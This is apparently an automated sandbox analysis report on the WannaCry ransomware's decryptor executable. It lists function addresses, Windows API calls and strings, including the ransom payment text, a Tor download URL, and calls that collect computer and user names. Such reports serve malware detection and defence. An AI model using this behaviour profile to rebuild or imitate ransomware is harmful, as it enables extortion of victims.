      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 004026B0: FindNextFileW.KERNEL32(?,?), ref: 0040296A
      • Part of subcall function 004026B0: FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
      • Part of subcall function 004026B0: DeleteFileW.KERNEL32(?), ref: 00402A16
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
      • Part of subcall function 004026B0: DeleteFileW.KERNEL32(?), ref: 00402A36
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402A6B
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402ABF
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406EF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
    APIs
    • #823.MFC42(?), ref: 00406F15
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
    • #825.MFC42(?), ref: 00406F62
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004030E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
    APIs
    • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404C40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
    APIs
    • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
    • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
    • #860.MFC42(00421798), ref: 00404CAD
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00408B40, Relevance: 7.6, APIs: 5, Instructions: 75
    APIs
    • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
    • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
    • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404530, Relevance: 7.6, APIs: 5, Instructions: 50
    APIs
    • #289.MFC42 ref: 0040455F
    • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
    • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
    • #613.MFC42 ref: 004045BB
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406CF0, Relevance: 7.5, APIs: 5, Instructions: 48
    APIs
    • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
    • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767AAD28), ref: 00406D39
    • SendMessageA.USER32 ref: 00406D69
    • #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
      • Part of subcall function 00406DC0: #823.MFC42(00000001,?,?), ref: 00406DEC
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E3E
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E5A
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
      • Part of subcall function 00406DC0: #6136.MFC42 ref: 00406EC4
      • Part of subcall function 00406DC0: #825.MFC42(?), ref: 00406ED7
    • #665.MFC42 ref: 00406D87
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407DB0, Relevance: 7.5, APIs: 5, Instructions: 42
    APIs
      • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
      • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
    • time.MSVCRT ref: 00407DEA
    • #2514.MFC42 ref: 00407E18
    • time.MSVCRT ref: 00407E2A
    • #765.MFC42 ref: 00407E49
    • #641.MFC42 ref: 00407E5D
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004031A0, Relevance: 7.5, APIs: 5, Instructions: 40
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
    • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
    • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
    • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040BE90, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 18
    APIs
    Strings
    • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
    • s.wnry, xrefs: 0040BE97
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00403AF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132
    APIs
    • fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
    • fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00402650: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000167,00000167), ref: 00402688
    • fclose.MSVCRT ref: 00403C62
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040BED0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108
    APIs
    • #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BAF0: strtok.MSVCRT ref: 0040BBA9
      • Part of subcall function 0040BAF0: strtok.MSVCRT ref: 0040BC22
      • Part of subcall function 0040BAF0: #825.MFC42(?,?), ref: 0040BCDD
      • Part of subcall function 0040BAF0: GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040BCEC
      • Part of subcall function 0040BAF0: srand.MSVCRT ref: 0040BCF3
      • Part of subcall function 0040BAF0: rand.MSVCRT ref: 0040BD09
      • Part of subcall function 0040BAF0: #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
      • Part of subcall function 0040BAF0: Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
      • Part of subcall function 0040BAF0: #825.MFC42(?,?,?,?), ref: 0040BDED
      • Part of subcall function 0040BAF0: #825.MFC42(?), ref: 0040BE7A
    • GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
    • GetUserNameA.ADVAPI32 ref: 0040BFF5
      • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
      • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040B6A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000000,00000428), ref: 0040B6B4
    • DeleteFileA.KERNEL32(?), ref: 0040B6D9
    • sprintf.MSVCRT ref: 0040B74E
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
      • Part of subcall function 00412A00: #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
      • Part of subcall function 00412A00: #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040D300, Relevance: 6.2, APIs: 4, Instructions: 159
    APIs
      • Part of subcall function 00412A90: malloc.MSVCRT ref: 00412A95
      • Part of subcall function 0040D2B0: memmove.MSVCRT ref: 0040D2E1
    • time.MSVCRT ref: 0040D408
    • Sleep.KERNEL32(00000064), ref: 0040D46B
    • time.MSVCRT ref: 0040D487
    • free.MSVCRT(?), ref: 0040D4A9
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040D150, Relevance: 6.1, APIs: 4, Instructions: 122
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004108A0, Relevance: 6.1, APIs: 4, Instructions: 107
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004108FB
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
    • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406A00, Relevance: 6.1, APIs: 4, Instructions: 70
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040D0A0, Relevance: 6.1, APIs: 4, Instructions: 64
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00405180, Relevance: 6.1, APIs: 4, Instructions: 51
    APIs
    • _mbscmp.MSVCRT ref: 00405191
    • #860.MFC42(?), ref: 004051A1
    • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00412A00, Relevance: 6.0, APIs: 4, Instructions: 45
    APIs
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
    • #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
    • #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404430, Relevance: 6.0, APIs: 4, Instructions: 44
    APIs
    • _TrackMouseEvent.COMCTL32(00000010), ref: 00404463
    • #2379.MFC42 ref: 0040446F
    • #2379.MFC42 ref: 004044AA
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    • SetCursor.USER32(?), ref: 004044A2
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404CF0, Relevance: 6.0, APIs: 4, Instructions: 37
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
    • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
    • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404170, Relevance: 6.0, APIs: 4, Instructions: 34
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
    • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00402E00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
    APIs
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407650, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
    APIs
    • #2379.MFC42(00000001), ref: 00407667
    • #2379.MFC42 ref: 00407692
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
      • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
      • Part of subcall function 004076A0: sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
      • Part of subcall function 004076A0: #540.MFC42 ref: 00407876
      • Part of subcall function 004076A0: _ftol.MSVCRT ref: 004078AA
      • Part of subcall function 004076A0: #2818.MFC42(?,$%d,00000000), ref: 004078BE
      • Part of subcall function 004076A0: #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
      • Part of subcall function 004076A0: #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
      • Part of subcall function 004076A0: #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
      • Part of subcall function 004076A0: #3092.MFC42(00000402,?), ref: 0040791D
      • Part of subcall function 004076A0: #6199.MFC42(00000402,?), ref: 00407924
      • Part of subcall function 004076A0: InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
      • Part of subcall function 004076A0: #800.MFC42 ref: 0040799F
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd

    Analysis Process: @WanaDecryptor@.exe PID: 3456 Parent PID: 3416

    Executed Functions

    Function 004064D0, Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 256
    APIs
    • #4710.MFC42 ref: 004064DC
    • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
    • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
      • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
      • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
      • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
      • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
      • Part of subcall function 00401C70: RegQueryValueExA.ADVAPI32 ref: 00401D81
      • Part of subcall function 00401C70: SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
      • Part of subcall function 00401C70: RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
    • strrchr.MSVCRT ref: 00406554
    • strrchr.MSVCRT ref: 00406564
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    • time.MSVCRT ref: 004065D1
      • Part of subcall function 00402C40: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
